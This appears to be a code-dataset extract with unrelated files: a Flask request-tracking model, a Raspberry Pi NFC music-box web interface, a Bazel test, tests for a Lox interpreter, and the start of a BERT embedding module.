print("{hw} has SN : {sn}".format(hw=hw_type, sn=serial_number)) | 0.28877 | 0.088583 |
from mongoengine import *
import json
class UserAgent(EmbeddedDocument):
browser = StringField()
language = StringField()
platform = StringField()
string = StringField()
version = StringField()
class Tracking(Document):
#session_key = models.CharField(max_length=40, null=True, blank=True, db_index=True)
date_created = DateTimeField()
host = StringField()
path = StringField()
query_params = StringField()
ip = StringField()
user = GenericReferenceField()
user_agent = EmbeddedDocumentField(UserAgent)
method = StringField()
request_headers = ListField()
request_body = BinaryField()
status_code = IntField()
response_headers = ListField()
# Execution time in ms
execution_time = IntField()
# System hostname
hostname = StringField()
custom_data = DynamicField()
meta = {
'max_documents': 10**6, # 1 million
}
def user_repr(self):
if self._data['user']:
if isinstance(self._data['user'], dict):
return self._data['user']['_ref'].id
else:
return self.user.id
else:
return '-'
def __unicode__(self):
return '{id} {date} {method} {user} {path}{query} {status} ({time} ms)'.format(
id=self.id,
date=self.date_created.strftime('%Y-%m-%d %H:%M:%S.%f'),
method=self.method,
user=self.user_repr(),
path=self.path,
query=self.query_params and '?%s' % self.query_params or '',
status=self.status_code,
time=self.execution_time)
def debug(self):
ret = '%s %s%s%s\n' % (self.method, self.host, self.path, self.query_params and '?%s' % self.query_params or '')
ret += 'REQUEST:\n'
ret += self.format_headers(self.request_headers) + '\n'
ret += '%s RESPONSE:\n' % self.status_code
ret += self.format_headers(self.response_headers) + '\n'
ret += self.format_body(self.response_body)
return ret
def get_header(self, name, default=''):
return { h[0]: h[1] for h in self.request_headers }.get(name, default)
def replay(self):
from flask import current_app
client = current_app.test_client()
# Make sure we don't send invalid cookies.
client.cookie_jar.clear()
full_path = self.path + ('?'+self.query_params if self.query_params else '')
method_func = getattr(client, self.method.lower())
return method_func(
full_path,
headers=self.request_headers,
data=self.request_body,
content_type=dict(self.request_headers)['Content-Type']
)
@staticmethod
def format_body(inpt):
"""Format an HTTP body as JSON if possible, otherwise return string"""
try:
return json.dumps(json.loads(inpt.decode('utf8')), indent=4)
except ValueError:
return repr(inpt)
@staticmethod
def format_headers(headers):
return '\n'.join([' %s: %s' % (h[0], h[1] if len(h[1]) < 100 else '%s...' % h[1][:100]) for h in headers]) | wicarproject/utilities/flask_tracking/documents.py | from mongoengine import *
import json
class UserAgent(EmbeddedDocument):
browser = StringField()
language = StringField()
platform = StringField()
string = StringField()
version = StringField()
class Tracking(Document):
#session_key = models.CharField(max_length=40, null=True, blank=True, db_index=True)
date_created = DateTimeField()
host = StringField()
path = StringField()
query_params = StringField()
ip = StringField()
user = GenericReferenceField()
user_agent = EmbeddedDocumentField(UserAgent)
method = StringField()
request_headers = ListField()
request_body = BinaryField()
status_code = IntField()
response_headers = ListField()
# Execution time in ms
execution_time = IntField()
# System hostname
hostname = StringField()
custom_data = DynamicField()
meta = {
'max_documents': 10**6, # 1 million
}
def user_repr(self):
if self._data['user']:
if isinstance(self._data['user'], dict):
return self._data['user']['_ref'].id
else:
return self.user.id
else:
return '-'
def __unicode__(self):
return '{id} {date} {method} {user} {path}{query} {status} ({time} ms)'.format(
id=self.id,
date=self.date_created.strftime('%Y-%m-%d %H:%M:%S.%f'),
method=self.method,
user=self.user_repr(),
path=self.path,
query=self.query_params and '?%s' % self.query_params or '',
status=self.status_code,
time=self.execution_time)
def debug(self):
ret = '%s %s%s%s\n' % (self.method, self.host, self.path, self.query_params and '?%s' % self.query_params or '')
ret += 'REQUEST:\n'
ret += self.format_headers(self.request_headers) + '\n'
ret += '%s RESPONSE:\n' % self.status_code
ret += self.format_headers(self.response_headers) + '\n'
ret += self.format_body(self.response_body)
return ret
def get_header(self, name, default=''):
return { h[0]: h[1] for h in self.request_headers }.get(name, default)
def replay(self):
from flask import current_app
client = current_app.test_client()
# Make sure we don't send invalid cookies.
client.cookie_jar.clear()
full_path = self.path + ('?'+self.query_params if self.query_params else '')
method_func = getattr(client, self.method.lower())
return method_func(
full_path,
headers=self.request_headers,
data=self.request_body,
content_type=dict(self.request_headers)['Content-Type']
)
@staticmethod
def format_body(inpt):
"""Format an HTTP body as JSON if possible, otherwise return string"""
try:
return json.dumps(json.loads(inpt.decode('utf8')), indent=4)
except ValueError:
return repr(inpt)
@staticmethod
def format_headers(headers):
return '\n'.join([' %s: %s' % (h[0], h[1] if len(h[1]) < 100 else '%s...' % h[1][:100]) for h in headers]) | 0.5144 | 0.090574 |
import main
import state
import utils
import os
from flask import Flask, render_template, request, redirect, cli
from werkzeug.utils import secure_filename
from nfc_reader import start_nfc_thread
from utils import printt
DEVENV = False
try:
# pylint: disable=import-error
import RPi.GPIO as GPIO
except:
DEVENV = True
app = Flask(__name__)
cli.show_server_banner = lambda *_: None
def init():
printt('Initializing web interface...')
app.config['TEMPLATES_AUTO_RELOAD'] = True
printt('Ready!')
def run_wait():
if DEVENV:
app.run(host='0.0.0.0', port=5000)
else:
app.run(host='0.0.0.0', port=80)
@app.route('/')
def index():
player = state.get_player()
vm = {
'nfc_status': state.get_nfc_status(),
'song_name': state.get_song_name(),
'is_playing': player.is_state(player.STATE_PLAYING),
'is_paused': player.is_state(player.STATE_PAUSED),
'is_stopped': player.is_state(player.STATE_STOPPED),
'version': main.VERSION
}
return render_template('index.html', vm=vm)
# ACTIONS
@app.route('/actions/initnfc')
def action_initnfc():
if not state.get_nfc_status():
start_nfc_thread()
return redirect('/')
@app.route('/actions/reloadsongs')
def action_reloadsongs():
player = state.get_player()
player.reload_songs()
return redirect('/tags')
@app.route('/actions/stop')
def action_stop():
player = state.get_player()
player.stop()
return redirect('/')
@app.route('/actions/play')
def action_play():
player = state.get_player()
player.play()
return redirect('/')
@app.route('/actions/pause')
def action_pause():
player = state.get_player()
player.pause()
return redirect('/')
@app.route('/actions/vol')
def action_vol():
try:
vol = float(request.args.get('vol'))
player = state.get_player()
player.set_vol(vol)
except:
pass
return redirect('/')
# LOGS
@app.route('/logs')
def logs():
log_path = '/var/log/nfcmb.log'
err_path = '/var/log/nfcmb_err.log'
log = ''
err = ''
if os.path.exists(log_path):
with open(log_path) as f:
log = f.read()
if os.path.exists(err_path):
with open(err_path) as f2:
err = f2.read()
return render_template('logs.html', vm={
'log': log,
'err': err
})
# SETTINGS
@app.route('/settings')
def settings():
return render_template('settings.html')
@app.route('/actions/settings/update')
def settings_update():
main.update()
return redirect('/settings')
@app.route('/actions/settings/reboot')
def settings_reboot():
main.reboot()
return redirect('/settings')
# TAGS
@app.route('/tags')
def tags():
storage = state.get_storage()
tags = storage.get_tags()
vm = {
'tags': tags
}
return render_template('tags.html', vm=vm)
@app.route('/tags/add', methods=['GET'])
def tags_add():
return render_template('tags_add.html', vm={
'error': request.args.get('error'),
'last_tag': state.get_last_tag()
})
@app.route('/tags/add', methods=['POST'])
def tags_add_post():
storage = state.get_storage()
songfile = request.files['song']
songname = songfile.filename.replace(' ', '_')
if songfile is not None \
and request.form['uid'] is not None \
and len(request.form['uid']) > 0 \
and songname.lower().endswith('.mp3'):
storage.add_song(songfile, secure_filename(songname))
else:
return redirect('/tags/add?error=1')
newtag = {
'uid': request.form['uid'],
'name': songname
}
try:
storage.add_tag(newtag)
except:
pass
return redirect('/tags')
@app.route('/actions/tags/play')
def tags_play():
storage = state.get_storage()
tags = storage.get_tags()
uid = request.args.get('uid')
tag = utils.select_tag(tags, uid)
if tag is not None:
player = state.get_player()
player.load(name=storage.to_full_path(tag['name']))
player.play()
return redirect('/tags')
@app.route('/actions/tags/delete')
def tag_delete():
uid = request.args.get('uid')
try:
storage = state.get_storage()
storage.remove_tag(uid)
except Exception as e:
printt(e)
return redirect('/tags') | web_interface.py | import main
import state
import utils
import os
from flask import Flask, render_template, request, redirect, cli
from werkzeug.utils import secure_filename
from nfc_reader import start_nfc_thread
from utils import printt
DEVENV = False
try:
# pylint: disable=import-error
import RPi.GPIO as GPIO
except:
DEVENV = True
app = Flask(__name__)
cli.show_server_banner = lambda *_: None
def init():
printt('Initializing web interface...')
app.config['TEMPLATES_AUTO_RELOAD'] = True
printt('Ready!')
def run_wait():
if DEVENV:
app.run(host='0.0.0.0', port=5000)
else:
app.run(host='0.0.0.0', port=80)
@app.route('/')
def index():
player = state.get_player()
vm = {
'nfc_status': state.get_nfc_status(),
'song_name': state.get_song_name(),
'is_playing': player.is_state(player.STATE_PLAYING),
'is_paused': player.is_state(player.STATE_PAUSED),
'is_stopped': player.is_state(player.STATE_STOPPED),
'version': main.VERSION
}
return render_template('index.html', vm=vm)
# ACTIONS
@app.route('/actions/initnfc')
def action_initnfc():
if not state.get_nfc_status():
start_nfc_thread()
return redirect('/')
@app.route('/actions/reloadsongs')
def action_reloadsongs():
player = state.get_player()
player.reload_songs()
return redirect('/tags')
@app.route('/actions/stop')
def action_stop():
player = state.get_player()
player.stop()
return redirect('/')
@app.route('/actions/play')
def action_play():
player = state.get_player()
player.play()
return redirect('/')
@app.route('/actions/pause')
def action_pause():
player = state.get_player()
player.pause()
return redirect('/')
@app.route('/actions/vol')
def action_vol():
try:
vol = float(request.args.get('vol'))
player = state.get_player()
player.set_vol(vol)
except:
pass
return redirect('/')
# LOGS
@app.route('/logs')
def logs():
log_path = '/var/log/nfcmb.log'
err_path = '/var/log/nfcmb_err.log'
log = ''
err = ''
if os.path.exists(log_path):
with open(log_path) as f:
log = f.read()
if os.path.exists(err_path):
with open(err_path) as f2:
err = f2.read()
return render_template('logs.html', vm={
'log': log,
'err': err
})
# SETTINGS
@app.route('/settings')
def settings():
return render_template('settings.html')
@app.route('/actions/settings/update')
def settings_update():
main.update()
return redirect('/settings')
@app.route('/actions/settings/reboot')
def settings_reboot():
main.reboot()
return redirect('/settings')
# TAGS
@app.route('/tags')
def tags():
storage = state.get_storage()
tags = storage.get_tags()
vm = {
'tags': tags
}
return render_template('tags.html', vm=vm)
@app.route('/tags/add', methods=['GET'])
def tags_add():
return render_template('tags_add.html', vm={
'error': request.args.get('error'),
'last_tag': state.get_last_tag()
})
@app.route('/tags/add', methods=['POST'])
def tags_add_post():
storage = state.get_storage()
songfile = request.files['song']
songname = songfile.filename.replace(' ', '_')
if songfile is not None \
and request.form['uid'] is not None \
and len(request.form['uid']) > 0 \
and songname.lower().endswith('.mp3'):
storage.add_song(songfile, secure_filename(songname))
else:
return redirect('/tags/add?error=1')
newtag = {
'uid': request.form['uid'],
'name': songname
}
try:
storage.add_tag(newtag)
except:
pass
return redirect('/tags')
@app.route('/actions/tags/play')
def tags_play():
storage = state.get_storage()
tags = storage.get_tags()
uid = request.args.get('uid')
tag = utils.select_tag(tags, uid)
if tag is not None:
player = state.get_player()
player.load(name=storage.to_full_path(tag['name']))
player.play()
return redirect('/tags')
@app.route('/actions/tags/delete')
def tag_delete():
uid = request.args.get('uid')
try:
storage = state.get_storage()
storage.remove_tag(uid)
except Exception as e:
printt(e)
return redirect('/tags') | 0.215268 | 0.049291 |
"Unit tests for //internal/common:expand_into_runfiles.bzl"
load("@bazel_skylib//lib:unittest.bzl", "asserts", "unittest")
load("//internal/common:expand_into_runfiles.bzl", "expand_location_into_runfiles")
def _impl(ctx):
env = unittest.begin(ctx)
conversions = {
"$(location //:package.json)": "build_bazel_rules_nodejs/package.json",
"$(location :a)": "build_bazel_rules_nodejs/internal/common/test/foo/bar/a.txt",
"$(location params_file.spec.js)": "build_bazel_rules_nodejs/internal/common/test/params_file.spec.js",
"$(locations :locations_in)": "build_bazel_rules_nodejs/package.json build_bazel_rules_nodejs/internal/common/test/foo/bar/a.txt build_bazel_rules_nodejs/internal/common/test/params_file.spec.js",
"$(rootpath //:package.json)": "./package.json",
"$(rootpath :a)": "internal/common/test/foo/bar/a.txt",
"$(rootpath params_file.spec.js)": "internal/common/test/params_file.spec.js",
"$(rootpaths :locations_in)": "./package.json internal/common/test/foo/bar/a.txt internal/common/test/params_file.spec.js",
}
for key in conversions:
asserts.equals(env, "%s" % conversions[key], expand_location_into_runfiles(ctx, "%s" % key))
asserts.equals(env, " %s " % conversions[key], expand_location_into_runfiles(ctx, " %s " % key))
asserts.equals(env, "%s%s" % (conversions[key], conversions[key]), expand_location_into_runfiles(ctx, "%s%s" % (key, key)))
asserts.equals(env, "%s %s" % (conversions[key], conversions[key]), expand_location_into_runfiles(ctx, "%s %s" % (key, key)))
asserts.equals(env, " %s %s " % (conversions[key], conversions[key]), expand_location_into_runfiles(ctx, " %s %s " % (key, key)))
asserts.equals(env, "a%sb%sc" % (conversions[key], conversions[key]), expand_location_into_runfiles(ctx, "a%sb%sc" % (key, key)))
return unittest.end(env)
expand_into_runfiles_test = unittest.make(
impl = _impl,
attrs = {
"deps": attr.label_list(default = [
"//:package.json",
"params_file.spec.js",
":a",
":locations_in",
], allow_files = True),
},
)
def expand_into_runfiles_test_suite():
unittest.suite("expand_into_runfiles_tests", expand_into_runfiles_test) | internal/common/test/expand_into_runfiles_test.bzl | "Unit tests for //internal/common:expand_into_runfiles.bzl"
load("@bazel_skylib//lib:unittest.bzl", "asserts", "unittest")
load("//internal/common:expand_into_runfiles.bzl", "expand_location_into_runfiles")
def _impl(ctx):
env = unittest.begin(ctx)
conversions = {
"$(location //:package.json)": "build_bazel_rules_nodejs/package.json",
"$(location :a)": "build_bazel_rules_nodejs/internal/common/test/foo/bar/a.txt",
"$(location params_file.spec.js)": "build_bazel_rules_nodejs/internal/common/test/params_file.spec.js",
"$(locations :locations_in)": "build_bazel_rules_nodejs/package.json build_bazel_rules_nodejs/internal/common/test/foo/bar/a.txt build_bazel_rules_nodejs/internal/common/test/params_file.spec.js",
"$(rootpath //:package.json)": "./package.json",
"$(rootpath :a)": "internal/common/test/foo/bar/a.txt",
"$(rootpath params_file.spec.js)": "internal/common/test/params_file.spec.js",
"$(rootpaths :locations_in)": "./package.json internal/common/test/foo/bar/a.txt internal/common/test/params_file.spec.js",
}
for key in conversions:
asserts.equals(env, "%s" % conversions[key], expand_location_into_runfiles(ctx, "%s" % key))
asserts.equals(env, " %s " % conversions[key], expand_location_into_runfiles(ctx, " %s " % key))
asserts.equals(env, "%s%s" % (conversions[key], conversions[key]), expand_location_into_runfiles(ctx, "%s%s" % (key, key)))
asserts.equals(env, "%s %s" % (conversions[key], conversions[key]), expand_location_into_runfiles(ctx, "%s %s" % (key, key)))
asserts.equals(env, " %s %s " % (conversions[key], conversions[key]), expand_location_into_runfiles(ctx, " %s %s " % (key, key)))
asserts.equals(env, "a%sb%sc" % (conversions[key], conversions[key]), expand_location_into_runfiles(ctx, "a%sb%sc" % (key, key)))
return unittest.end(env)
expand_into_runfiles_test = unittest.make(
impl = _impl,
attrs = {
"deps": attr.label_list(default = [
"//:package.json",
"params_file.spec.js",
":a",
":locations_in",
], allow_files = True),
},
)
def expand_into_runfiles_test_suite():
unittest.suite("expand_into_runfiles_tests", expand_into_runfiles_test) | 0.58166 | 0.314524 |
import pytest
from yaplox.expr import Binary, Grouping, Literal, Unary
from yaplox.interpreter import Interpreter
from yaplox.parser import Parser
from yaplox.scanner import Scanner
from yaplox.stmt import Expression
from yaplox.token_type import TokenType
from yaplox.yaplox_runtime_error import YaploxRuntimeError
class TestInterpreter:
def test_visit_grouping_expr(self):
nested = Literal("18")
expr = Grouping(nested)
result = Interpreter().visit_grouping_expr(expr)
assert result == nested.value
def test_visit_literal_expr(self):
expr = Literal("42")
result = Interpreter().visit_literal_expr(expr)
assert result == "42"
@pytest.mark.parametrize(
("token_type", "literal", "expected"),
[
(TokenType.MINUS, 34, -34.0),
(TokenType.MINUS, -42, 42.0),
(TokenType.MINUS, -0, 0.0),
(TokenType.MINUS, 0, -0.0),
(TokenType.BANG, False, True),
(TokenType.BANG, True, False),
(TokenType.BANG, None, True), # !None == True
(TokenType.BANG, "Stringy", False),
(TokenType.BANG, "", False),
(TokenType.BANG, 0, False),
(TokenType.BANG, "0", False),
],
)
def test_visit_unary_expr(
self, create_token_factory, token_type, literal, expected
):
token = create_token_factory(token_type=token_type)
expr = Unary(token, right=Literal(literal))
result = Interpreter().visit_unary_expr(expr)
if isinstance(expected, bool):
assert result is expected
else:
assert result == expected
def test_visit_unary_sad_flow(self, create_token_factory):
# -"Foo" Should result in an error
token = create_token_factory(token_type=TokenType.MINUS)
expr = Unary(token, right=Literal("Foo"))
with pytest.raises(YaploxRuntimeError) as excinfo:
Interpreter().visit_unary_expr(expr)
assert "Foo must be a number" in str(excinfo.value)
@pytest.mark.parametrize(
("left", "token_type", "right", "expected"),
[
(10, TokenType.GREATER, 7, True),
(10, TokenType.GREATER_EQUAL, 10, True),
(7, TokenType.LESS, 10, True),
(7, TokenType.LESS_EQUAL, 7, True),
(7, TokenType.BANG_EQUAL, 7, False),
(7, TokenType.BANG_EQUAL, 10, True),
(None, TokenType.BANG_EQUAL, None, False), # None !=None
(None, TokenType.EQUAL_EQUAL, None, True), # None ==None
(None, TokenType.BANG_EQUAL, 5, True), # None != 5
(None, TokenType.EQUAL_EQUAL, 5, False), # None == 5
(5, TokenType.EQUAL_EQUAL, None, False), # 5 == None
("FooBar", TokenType.BANG_EQUAL, "BarFoo", True),
("FooBar", TokenType.EQUAL_EQUAL, "BarFoo", False),
("FooBar", TokenType.BANG_EQUAL, "FooBar", False),
("FooBar", TokenType.EQUAL_EQUAL, "FooBar", True),
(10, TokenType.MINUS, 7, 3),
(10, TokenType.MINUS, 20, -10),
(10, TokenType.MINUS, 20, -10),
(10, TokenType.SLASH, 2, 5),
(10, TokenType.SLASH, 3, 3.3333333333333335),
(5, TokenType.STAR, 5, 25),
(5, TokenType.STAR, 0, 0),
(2, TokenType.PLUS, 2, 4),
("Foo", TokenType.PLUS, "Bar", "FooBar"),
],
)
def test_visit_binary_expr(
self, create_token_factory, left, token_type, right, expected
):
operator = create_token_factory(token_type=token_type)
expr_left = Literal(left)
expr_right = Literal(right)
expr = Binary(left=expr_left, operator=operator, right=expr_right)
result = Interpreter().visit_binary_expr(expr)
if isinstance(expected, bool):
assert result is expected
else:
assert result == expected
@pytest.mark.parametrize(
("left", "token_type", "right"),
[
(10, TokenType.MINUS, "String"),
(10, TokenType.GREATER, "Foo"),
("43", TokenType.PLUS, 18),
(43, TokenType.PLUS, "18"),
],
)
def test_binary_expression_failing(
self, create_token_factory, left, token_type, right
):
operator = create_token_factory(token_type=token_type)
expr_left = Literal(left)
expr_right = Literal(right)
expr = Binary(left=expr_left, operator=operator, right=expr_right)
with pytest.raises(YaploxRuntimeError):
Interpreter().visit_binary_expr(expr)
def test_nested_binary_expr(self, create_token_factory, mocker):
""" Test nested binary expressions, 4 * 6 / 2 """
on_scanner_error_mock = mocker.MagicMock()
on_parser_error_mock = mocker.MagicMock()
test_string = "4 * 6 / 2;"
scanner = Scanner(test_string, on_error=on_scanner_error_mock)
tokens = scanner.scan_tokens()
parser = Parser(tokens, on_token_error=on_parser_error_mock)
statements = parser.parse()
expr: Expression = statements[0].expression
assert isinstance(expr, Binary)
assert isinstance(expr.left, Binary)
assert isinstance(expr.right, Literal)
assert expr.operator.token_type == TokenType.SLASH
assert expr.right.value == 2.0
# Left will be 4 * 6
assert expr.left.operator.token_type == TokenType.STAR
assert expr.left.left.value == 4
assert expr.left.right.value == 6
result = Interpreter().visit_binary_expr(expr)
assert result == 12
def test_unknown_operator(self, create_token_factory):
operator = create_token_factory(token_type=TokenType.EOF)
expr_left = Literal(None)
expr_right = Literal(None)
expr = Binary(left=expr_left, operator=operator, right=expr_right)
with pytest.raises(YaploxRuntimeError):
Interpreter().visit_binary_expr(expr)
@pytest.mark.parametrize(
("expression", "result"),
[
("4 * 6 / 2;", "12"),
("12 < 6;", "False"),
("12 > 6;", "True"),
("3 + 3;", "6"),
],
)
def test_interpret(self, mocker, expression, result):
on_scanner_error_mock = mocker.MagicMock()
on_parser_error_mock = mocker.MagicMock()
scanner = Scanner(expression, on_error=on_scanner_error_mock)
tokens = scanner.scan_tokens()
parser = Parser(tokens, on_token_error=on_parser_error_mock)
statements = parser.parse()
result = Interpreter().interpret(statements)
assert result == result
def test_interpret_error(self, mocker):
on_scanner_error_mock = mocker.MagicMock()
on_parser_error_mock = mocker.MagicMock()
on_interpret_error_mock = mocker.MagicMock()
expression = '0 + "Foo";'
scanner = Scanner(expression, on_error=on_scanner_error_mock)
tokens = scanner.scan_tokens()
parser = Parser(tokens, on_token_error=on_parser_error_mock)
statements = parser.parse()
Interpreter().interpret(statements, on_error=on_interpret_error_mock)
# There will be an error
assert on_interpret_error_mock.called
assert "Operands must be two numbers or two strings" in str(
on_interpret_error_mock.call_args
)
def test_assignment(self, mocker):
on_scanner_error_mock = mocker.MagicMock()
on_parser_error_mock = mocker.MagicMock()
on_interpret_error_mock = mocker.MagicMock()
lines = [
"var a = 0;",
"var c = a;",
"var b;",
"a = 3 + 6;",
"b = 3 / 6;",
"a = a + b;",
"print(a);",
"a;",
]
expression = "\n".join(lines)
scanner = Scanner(expression, on_error=on_scanner_error_mock)
tokens = scanner.scan_tokens()
parser = Parser(tokens, on_token_error=on_parser_error_mock)
statements = parser.parse()
result = Interpreter().interpret(statements, on_error=on_interpret_error_mock)
assert result == 9.5
def test_stringify(self, run_code_lines):
lines = [
"var a;",
"print(a);",
]
assert run_code_lines(lines).out == "nil\n" | tests/test_interpreter.py | import pytest
from yaplox.expr import Binary, Grouping, Literal, Unary
from yaplox.interpreter import Interpreter
from yaplox.parser import Parser
from yaplox.scanner import Scanner
from yaplox.stmt import Expression
from yaplox.token_type import TokenType
from yaplox.yaplox_runtime_error import YaploxRuntimeError
class TestInterpreter:
def test_visit_grouping_expr(self):
nested = Literal("18")
expr = Grouping(nested)
result = Interpreter().visit_grouping_expr(expr)
assert result == nested.value
def test_visit_literal_expr(self):
expr = Literal("42")
result = Interpreter().visit_literal_expr(expr)
assert result == "42"
@pytest.mark.parametrize(
("token_type", "literal", "expected"),
[
(TokenType.MINUS, 34, -34.0),
(TokenType.MINUS, -42, 42.0),
(TokenType.MINUS, -0, 0.0),
(TokenType.MINUS, 0, -0.0),
(TokenType.BANG, False, True),
(TokenType.BANG, True, False),
(TokenType.BANG, None, True), # !None == True
(TokenType.BANG, "Stringy", False),
(TokenType.BANG, "", False),
(TokenType.BANG, 0, False),
(TokenType.BANG, "0", False),
],
)
def test_visit_unary_expr(
self, create_token_factory, token_type, literal, expected
):
token = create_token_factory(token_type=token_type)
expr = Unary(token, right=Literal(literal))
result = Interpreter().visit_unary_expr(expr)
if isinstance(expected, bool):
assert result is expected
else:
assert result == expected
def test_visit_unary_sad_flow(self, create_token_factory):
# -"Foo" Should result in an error
token = create_token_factory(token_type=TokenType.MINUS)
expr = Unary(token, right=Literal("Foo"))
with pytest.raises(YaploxRuntimeError) as excinfo:
Interpreter().visit_unary_expr(expr)
assert "Foo must be a number" in str(excinfo.value)
@pytest.mark.parametrize(
("left", "token_type", "right", "expected"),
[
(10, TokenType.GREATER, 7, True),
(10, TokenType.GREATER_EQUAL, 10, True),
(7, TokenType.LESS, 10, True),
(7, TokenType.LESS_EQUAL, 7, True),
(7, TokenType.BANG_EQUAL, 7, False),
(7, TokenType.BANG_EQUAL, 10, True),
(None, TokenType.BANG_EQUAL, None, False), # None !=None
(None, TokenType.EQUAL_EQUAL, None, True), # None ==None
(None, TokenType.BANG_EQUAL, 5, True), # None != 5
(None, TokenType.EQUAL_EQUAL, 5, False), # None == 5
(5, TokenType.EQUAL_EQUAL, None, False), # 5 == None
("FooBar", TokenType.BANG_EQUAL, "BarFoo", True),
("FooBar", TokenType.EQUAL_EQUAL, "BarFoo", False),
("FooBar", TokenType.BANG_EQUAL, "FooBar", False),
("FooBar", TokenType.EQUAL_EQUAL, "FooBar", True),
(10, TokenType.MINUS, 7, 3),
(10, TokenType.MINUS, 20, -10),
(10, TokenType.MINUS, 20, -10),
(10, TokenType.SLASH, 2, 5),
(10, TokenType.SLASH, 3, 3.3333333333333335),
(5, TokenType.STAR, 5, 25),
(5, TokenType.STAR, 0, 0),
(2, TokenType.PLUS, 2, 4),
("Foo", TokenType.PLUS, "Bar", "FooBar"),
],
)
def test_visit_binary_expr(
self, create_token_factory, left, token_type, right, expected
):
operator = create_token_factory(token_type=token_type)
expr_left = Literal(left)
expr_right = Literal(right)
expr = Binary(left=expr_left, operator=operator, right=expr_right)
result = Interpreter().visit_binary_expr(expr)
if isinstance(expected, bool):
assert result is expected
else:
assert result == expected
@pytest.mark.parametrize(
("left", "token_type", "right"),
[
(10, TokenType.MINUS, "String"),
(10, TokenType.GREATER, "Foo"),
("43", TokenType.PLUS, 18),
(43, TokenType.PLUS, "18"),
],
)
def test_binary_expression_failing(
self, create_token_factory, left, token_type, right
):
operator = create_token_factory(token_type=token_type)
expr_left = Literal(left)
expr_right = Literal(right)
expr = Binary(left=expr_left, operator=operator, right=expr_right)
with pytest.raises(YaploxRuntimeError):
Interpreter().visit_binary_expr(expr)
def test_nested_binary_expr(self, create_token_factory, mocker):
""" Test nested binary expressions, 4 * 6 / 2 """
on_scanner_error_mock = mocker.MagicMock()
on_parser_error_mock = mocker.MagicMock()
test_string = "4 * 6 / 2;"
scanner = Scanner(test_string, on_error=on_scanner_error_mock)
tokens = scanner.scan_tokens()
parser = Parser(tokens, on_token_error=on_parser_error_mock)
statements = parser.parse()
expr: Expression = statements[0].expression
assert isinstance(expr, Binary)
assert isinstance(expr.left, Binary)
assert isinstance(expr.right, Literal)
assert expr.operator.token_type == TokenType.SLASH
assert expr.right.value == 2.0
# Left will be 4 * 6
assert expr.left.operator.token_type == TokenType.STAR
assert expr.left.left.value == 4
assert expr.left.right.value == 6
result = Interpreter().visit_binary_expr(expr)
assert result == 12
def test_unknown_operator(self, create_token_factory):
operator = create_token_factory(token_type=TokenType.EOF)
expr_left = Literal(None)
expr_right = Literal(None)
expr = Binary(left=expr_left, operator=operator, right=expr_right)
with pytest.raises(YaploxRuntimeError):
Interpreter().visit_binary_expr(expr)
@pytest.mark.parametrize(
("expression", "result"),
[
("4 * 6 / 2;", "12"),
("12 < 6;", "False"),
("12 > 6;", "True"),
("3 + 3;", "6"),
],
)
def test_interpret(self, mocker, expression, result):
on_scanner_error_mock = mocker.MagicMock()
on_parser_error_mock = mocker.MagicMock()
scanner = Scanner(expression, on_error=on_scanner_error_mock)
tokens = scanner.scan_tokens()
parser = Parser(tokens, on_token_error=on_parser_error_mock)
statements = parser.parse()
result = Interpreter().interpret(statements)
assert result == result
def test_interpret_error(self, mocker):
on_scanner_error_mock = mocker.MagicMock()
on_parser_error_mock = mocker.MagicMock()
on_interpret_error_mock = mocker.MagicMock()
expression = '0 + "Foo";'
scanner = Scanner(expression, on_error=on_scanner_error_mock)
tokens = scanner.scan_tokens()
parser = Parser(tokens, on_token_error=on_parser_error_mock)
statements = parser.parse()
Interpreter().interpret(statements, on_error=on_interpret_error_mock)
# There will be an error
assert on_interpret_error_mock.called
assert "Operands must be two numbers or two strings" in str(
on_interpret_error_mock.call_args
)
def test_assignment(self, mocker):
on_scanner_error_mock = mocker.MagicMock()
on_parser_error_mock = mocker.MagicMock()
on_interpret_error_mock = mocker.MagicMock()
lines = [
"var a = 0;",
"var c = a;",
"var b;",
"a = 3 + 6;",
"b = 3 / 6;",
"a = a + b;",
"print(a);",
"a;",
]
expression = "\n".join(lines)
scanner = Scanner(expression, on_error=on_scanner_error_mock)
tokens = scanner.scan_tokens()
parser = Parser(tokens, on_token_error=on_parser_error_mock)
statements = parser.parse()
result = Interpreter().interpret(statements, on_error=on_interpret_error_mock)
assert result == 9.5
def test_stringify(self, run_code_lines):
lines = [
"var a;",
"print(a);",
]
assert run_code_lines(lines).out == "nil\n" | 0.569134 | 0.617167 |
import torch
import torch.nn as nn
import torch.nn.functional as F
import os
import json
import random
from typing import NamedTuple, Optional, Iterable, Tuple
from transformers import BertModel, BertPreTrainedModel
from transformers.modeling_bert import BertLMPredictionHead, ACT2FN
from transformers.configuration_bert import BertConfig
from transformers.modeling_outputs import BaseModelOutputWithPooling
BertLayerNorm = nn.LayerNorm
class Config(NamedTuple):
"Configuration for BERT model"
vocab_size: int = 40443 # Size of Vocabulary
dim: int = 1024 # Dimension of Hidden Layer in Transformer Encoder
layers: int = 12 # Numher of Encoder Layers
n_heads: int = 8 # Numher of Heads in Multi-Headed Attention Layers
dim_ff: int = 768*4 # Dimension of Intermediate Layers in Positionwise Feedforward Net
p_drop_hidden: float = 0.3 # Probability of Dropout of various Hidden Layers
p_drop_attn: float = 0.3 # Probability of Dropout of Attention Layers
max_n_clips: int = 10 # Maximum video clips for each comment
max_comment_len: int = 56 # Maximun words for each comment
max_comment_len_CMLM: int = 50
max_pos_len_CMLM: int = 6
max_context_len: int = 128 # Maximum words for context comments
max_len : int = 196
pair_loss_weight : float = 1.0
next_sentence_loss_weight: float = 5
pos_loss_weight: float = 1
@classmethod
def load_from_json(cls, file):
return cls(**json.load(open(file, "r")))
class MyBertEmbeddings(nn.Module):
"""Construct the embeddings from word, position and token_type embeddings."""
def __init__(self, config):
super(MyBertEmbeddings, self).__init__()
self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=config.pad_token_id)
self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)
self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)
# self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load
# any TensorFlow checkpoint file
self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
# position_ids (1, len position emb) is contiguous in memory and exported when serialized
self.register_buffer("position_ids", torch.arange(config.max_position_embeddings).expand((1, -1)))
def forward(self, input_ids=None, token_type_ids=None, position_ids=None, inputs_embeds=None):
if input_ids is not None:
input_shape = input_ids.size()
else:
input_shape = inputs_embeds.size()[:-1]
#print("input_ids",input_ids[0,:])
#print("token_type_ids",token_type_ids[0,:])
